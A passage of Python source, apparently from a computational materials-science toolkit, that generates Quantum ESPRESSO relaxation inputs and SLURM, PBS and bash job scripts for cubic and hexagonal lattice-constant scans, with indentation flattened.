# so we do not copy all UPF files in the directory but just copy
# those used in the calculation.
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
with open(os.path.join(directory, inpname), 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
self.arts.to_in(fout)
# gen llhpc script
self.gen_llhpc(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
# gen pbs script
self.gen_pbs(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX", jobname=self.run_params["jobname"], nodes=self.run_params["nodes"], ppn=self.run_params["ppn"], queue=self.run_params["queue"])
# gen cdcloud script
self.gen_cdcloud(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("%s $PMF_PWX < %s | tee %s" % (self.run_params["mpi"], inpname, output))
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="relax", server=self.run_params["server"])
def vc_relax(self, directory="tmp-qe-vc-relax", inpname="vc-relax.in", output="vc-relax.out", runopt="gen", auto=0):
"""
:param directory: a place for all the generated files
"""
#self.set_vc_relax()
if runopt == "gen" or runopt == "genrun":
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
#os.system("cp *.UPF %s/" % directory)
#os.system("cp %s %s/" % (self.arts.xyz.file, directory))
# do not copy too many files at the same time or it will be slow
# so we do not copy all UPF files in the directory but just copy
# those used in the calculation.
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
#
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
with open(os.path.join(directory, inpname), 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
self.cell.to_in(fout)
self.arts.to_in(fout)
# gen yhbatch script
self.gen_yh(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
# gen pbs script
self.gen_pbs(directory=directory, inpname=inpname, cmd="$PMF_PWX", output=output, jobname=self.run_params["jobname"], nodes=self.run_params["nodes"], ppn=self.run_params["ppn"], queue=self.run_params["queue"])
# gen cdcloud script
self.gen_cdcloud(directory=directory, inpname=inpname, output=output, cmd="$PMF_PWX")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
os.system("%s $PMF_PWX < %s | tee %s" % (self.run_params["mpi"], inpname, output))
os.chdir("../")
server_handle(auto=auto, directory=directory, jobfilebase="vc-relax", server=self.run_params["server"])
def set_relax(self):
self.control.calculation("relax")
self.control.basic_setting("relax")
self.system.basic_setting(self.arts)
self.electrons.basic_setting()
self.ions.basic_setting()
def set_vc_relax(self):
self.control.calculation("vc-relax")
self.control.basic_setting("vc-relax")
self.system.basic_setting(self.arts)
self.electrons.basic_setting()
self.ions.basic_setting()
def cubic(self, directory="tmp-qe-relax-cubic", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
if self.batch_a == None:
# None means: run all values in one batch
self.batch_a = na
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
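# ceil-division sketch (hypothetical numbers, not taken from any run):
# with range_a = [-0.1, 0.101, 0.01], np.arange yields na = 21 offsets;
# batch_a = 5 then gives n_batch_a = int(21 / 5) + 1 = 5 batches
# (the last batch holds a single value), i.e. n_batch_a = ceil(na / batch_a).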
#
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal (fractional) coordinates can be converted from cartesian coordinates;
# the conversion is a change of basis, analogous to a change of representation
# in quantum mechanics; convmat is built to perform that conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
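# basis-change sketch: with the cell rows as lattice vectors A (3x3), a cartesian
# position r and its fractional counterpart f satisfy r = A.T @ f, so
# f = inv(A.T) @ r, which is exactly what convmat.dot(...) computes above.
# e.g. (hypothetical cell) A = diag(2, 2, 2): cartesian (1, 1, 1) maps to
# fractional (0.5, 0.5, 0.5).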
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# write the forces acting on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
# gen llhpc script
with open("relax-cubic-%d.slurm" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
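# window sketch (hypothetical: range_a = [-0.1, 0.101, 0.01], batch_a = 5):
# batch 0 runs seq from a-0.100 to a-0.055 in steps of 0.01, i.e. offsets
# -0.10 -0.09 -0.08 -0.07 -0.06 -- exactly 5 values; offset -0.05 is the
# start of batch 1 and is excluded by the half-step trim above.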
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
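# the writes above emit a bash script of roughly this shape (values illustrative,
# $PMF_PWX is assumed to point at the pw.x executable):
#   for a in `seq -w 2.900000 0.010000 3.100000`
#   do
#     cp relax.in.template relax-${a}.in
#     vec11=$(printf "%-.6f" `echo "scale=6; result=${a1} * ${a} / ${a_in}; print result" | bc`)
#     ...append CELL_PARAMETERS with the scaled vectors, then run relax-${a}.in
#   done
# every lattice vector is rescaled by a/a_in, so the cell stays cubic while a is scanned.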
# gen pbs script
with open("relax-cubic-%d.pbs" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
# gen local bash script
with open("relax-cubic-%d.sh" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
# gen cdcloud script
with open("relax-cubic-%d.slurm_cd" % (i_batch_a), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d\n" % (self.run_params["jobname"], i_batch_a))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# subtracting range_a[2] / 2 drops the endpoint, which is actually the beginning of the next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${a} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
os.system("bash relax-cubic-%d.sh" % i_batch_a)
os.chdir("../")
for i_batch_a in range(n_batch_a):
server_handle(auto=auto, directory=directory, jobfilebase="relax-cubic-%d" % i_batch_a, server=self.run_params["server"])
def hexagonal(self, directory="tmp-qe-hexagonal", runopt="gen", auto=0, range_a=[-0.1, 0.101, 0.01], range_c=[-0.1, 0.101, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a == None:
# None means: run all values in one batch
self.batch_a = na
else:
pass
if self.batch_c == None:
# None means: run all values in one batch
self.batch_c = nc
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
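# grid sketch (hypothetical numbers): with na = nc = 21 and batch_a = batch_c = 5,
# n_batch_a = n_batch_c = int(21 / 5) + 1 = 5, so the a/c scan is split into
# 5 * 5 = 25 job scripts, each covering a batch_a x batch_c window of the (a, c) grid.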
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal (fractional) coordinates can be converted from cartesian coordinates;
# the conversion is a change of basis, analogous to a change of representation
# in quantum mechanics; convmat is built to perform that conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# write the forces acting on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
# gen llhpc script
with open("relax-hexagonal-%d-%d.slurm" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
